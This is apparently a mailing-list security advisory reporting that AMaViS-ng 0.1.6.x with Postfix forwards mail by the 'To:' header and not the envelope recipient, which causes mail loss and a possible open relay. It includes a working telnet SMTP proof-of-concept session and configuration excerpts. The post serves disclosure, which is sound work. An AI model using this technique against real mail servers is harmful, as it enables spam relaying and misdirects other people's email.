AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss

[Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1 () protected unixadm org>]

Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is 
not vulnerable), all email gets forwarded to the address specified by the 
"To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX () domainX tld
(250 ok)
rcpt to:userY () domain tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX () domainX tld
To: userZ () domainZ tld
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x 
installed must accept emails for userY () domain tld.

What does it to:
userX () domainX tld is sending an email to userY () domain tld. The header of this 
email contains "To: userZ () domain tld". AMaViS-ng seems to parse the header 
and forwards the email to userZ () domain tld. userY () domain tld does not get 
this email.
As many postfix users trust their localhost (no restrictions for localhost), 
it is possible to relay an email or a spam mail this way.

configuration files (relevant parts):

# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf

# $amavis-ng/amavis.conf
[global]
mail-transfer-agent = Postfix

[Postfix]
postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc